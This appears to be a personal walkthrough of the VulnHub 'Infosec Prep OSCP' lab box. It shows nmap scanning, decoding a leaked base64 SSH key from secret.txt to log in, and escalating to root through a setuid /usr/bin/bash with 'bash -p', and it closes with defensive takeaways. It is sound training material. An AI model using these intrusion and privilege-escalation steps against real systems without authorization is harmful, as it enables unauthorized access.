I did this box for the OSCP voucher giveaway back in July. I had to wait until the contest was over. I was not one of the lucky winners. :‘( Good experience nonetheless.
Scanning and Enumeration
The first step is always an nmap scan:
sudo nmap -sV -sC 10.0.2.4
This scan was hella fast which saved me the time of enumerating directories with Gobuster.
sudo nmap -sV -T4 -p- -oN 10.0.2.4 (out)Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-18 11:07 EDT (out)Nmap scan report for 10.0.2.4 (out)Host is up (0.23s latency). (out)Not shown: 998 closed ports (out)PORT STATE SERVICE VERSION (out)22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0) (out)80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) (out)|_http-generator: WordPress 5.4.2 (out)| http-robots.txt: 1 disallowed entry (out)|_/secret.txt (out)|_http-server-header: Apache/2.4.41 (Ubuntu) (out)|_http-title: OSCP Voucher – Just another WordPress site (out)Nmap done: 1 IP address (1 host up) scanned in 6.08 seconds
Gaining access via SSH
Since the scan came back so fast, I didn’t even have a chance to go look for a robots.txt file which would have been my first move after starting a Gobuster scan. In the nmap scan, there is a secret.txt file.
I downloaded and opened the secret.txt file, it’s a base64. At first I thought it was a certificate missing the comments at the beginning and end. I tried adding those and SSHing, but it didn’t work, so I tried decoding the base64 and it turned out to be the certifcate which I then used to SSH. I guessed the oscp user because that is the user that appeared on the VMs login screen. I did try root@ first which did not work:
cat secret.txt | base64 -d > key
chmod 600 key
ssh -i key_file email@example.com
Enumerating for Privilege Escalation
Once I am in the box I
id and I am user named oscp without root.
id (out)uid=1000(oscp) gid=1000(oscp) groups=1000(oscp),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lxd)
Next I check for access to:
- /root directory. Nope not so lucky.
- /home directory. There is one directory for a user named
I checked out the contents of
/home/oscp and found an ip file. This file was owned by root and I was thinking this would be a file run by a cron job maybe, but that didn’t pan out. If there was something there I missed it.
ls -la /home/oscp (out)-rwxr-xr-x 1 root root 88 Jul 18 11:04 ip
Next I downloaded my favorite Linux enumeration script: Linux Smart Enumeration. Sometimes you have to start a Python server on your machine to do this, but this time I was able to get it directly from GitHub.
I gave the script proper permissions and ran it. The output is enormous so I’m only including what immediately stuck out to me and ended up being the answer:
chmod +x lse.sh ./lse.sh (out)[!] fst020 Uncommon setuid binaries........................................ yes! (out)--- (out)/usr/bin/bash
Getting Root Flag
Once I see setuid binaries, I head over to GTFOBins
I didn’t have a password and could not use sudo so I tried:
sh -c 'cp $(which bash) .; chmod +s ./bash' ./bash -p
I was still unprivileged oscp. :(
After re-reading the GTFOBins notes which I should have done in the first place: “To exploit an existing SUID binary skip the first command and run the program using its original path”, I tried:
/usr/bin/bash -p id (out)uid=1000(oscp) gid=1000(oscp) euid=0(root) egid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lxd),1000(oscp)
ls /root (out)fix-wordpress flag.txt snap cat /root/flag.txt
- If you find a base64 try decoding it before trying anything else with it.
- Read the details for exploits you are using, don't just start copying and pasting stuff without understanding.
- Ensure you have not misconfigured binaries with suid.
- Don't leave ssh keys exposed.
Try the VulnHub Infosec Prep OSCP box